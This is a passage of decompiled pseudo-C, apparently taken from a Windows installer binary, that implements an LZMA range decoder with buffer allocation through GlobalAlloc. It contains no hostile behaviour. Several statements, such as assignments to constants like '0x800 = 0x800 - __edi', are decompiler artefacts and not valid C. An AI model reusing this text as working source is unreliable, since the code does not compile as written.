				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
